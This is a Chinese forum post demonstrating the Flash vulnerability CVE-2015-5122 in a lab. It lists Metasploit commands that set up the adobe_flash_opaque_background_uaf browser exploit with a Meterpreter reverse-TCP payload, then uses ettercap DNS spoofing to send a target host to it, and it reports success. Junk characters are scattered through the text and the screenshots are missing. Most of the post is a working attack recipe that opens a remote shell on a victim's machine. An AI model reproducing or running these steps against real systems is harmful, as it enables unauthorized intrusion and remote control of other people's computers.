cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

2 M9 M' W; k- z* b! L! i 二、cve2015-5122漏洞实例演示虚拟机 , |6 w3 \+ c. a" C: G

% K1 {( p; ?( X9 ^& I 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： ' n4 ^, [( M( P' W

% |0 U$ O; R6 m- W5 s- G9 r/ A search cve-2015-5122如图： 3 u. [' l* L8 f* o) j3 B0 P* d

1 f; W5 P& K; D( e2 s, g. d / F6 v* q0 G# \! N- ]" u/ l1 F( {3 S

1 m* \, d/ F' C. b& ?& T 下面我们敲如下命令： " Z' Z& \* C k. @: I4 M: h

2 R0 I3 [- z- _; o( V use exploit/multi/browser/adobe_flash_opaque_background_uaf 7 r5 x+ Q6 N7 c9 `

3 G" }- Z; u" z' U7 s% u ^ set PAYLOAD windows/meterpreter/reverse_tcp 2 t2 \$ ^7 U1 X( R# H2 m( e6 W

* U& y' s1 g% |$ A& \- D set LHOST 192.168.0.109 3 N+ v& ~- s$ J9 [: S3 x

8 n# {) q8 h l set URIPATH / /*根目录*/ $ Y4 f+ d1 W) z

4 _& D5 T+ o [" { set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 $ r( N" w" [ h4 ^0 W, [

[$ N* U! Z# a0 w# T set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ; N- `) h- R0 Y' ~* f5 f, `

) s ^) Z% n" b3 o 然后show options如图： 8 X% f& g; a/ ~

x; N! S# o2 p7 k) z 5 g+ j7 K% N' X) T# `, A) ~

7 `! m/ f+ ~2 V w3 ~8 ?5 @ 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
/ }" k8 r# N# O( U / b ?7 p8 M5 V7 [2 B

3 b: [" v8 O. b- I: ^! d 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 9 s8 I8 _1 S9 g

+ o; g# h* w+ y" H, `1 P# g7 ? Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf * K3 f3 Q. v' b' g" \

& g+ }! A: k: D4 W" |! A7 A U : w% Y0 h; T+ J; U% B. ]

: H- b0 Z- G8 |( O+ c" }3 ^ 成功了，这时候我们断开ettercap，如图： 4 {( X( ]) `; S2 [8 C

5 i/ L9 T3 X" Z2 G. ` * l' Z1 B; x* ~% {- z

" H" ], O T0 ~; q2 E3 H2 b3 P Screenshot如图： + O7 x- U( D! e2 }% j

8 V8 f9 B& p; Q- k ' x/ ]- H! N/ ?! u% F

- H' c8 M4 H$ ?8 ` 2 Q; f3 v: |8 b/ r# B0 Z4 K0 a

		自动登录	找回密码
密码			立即注册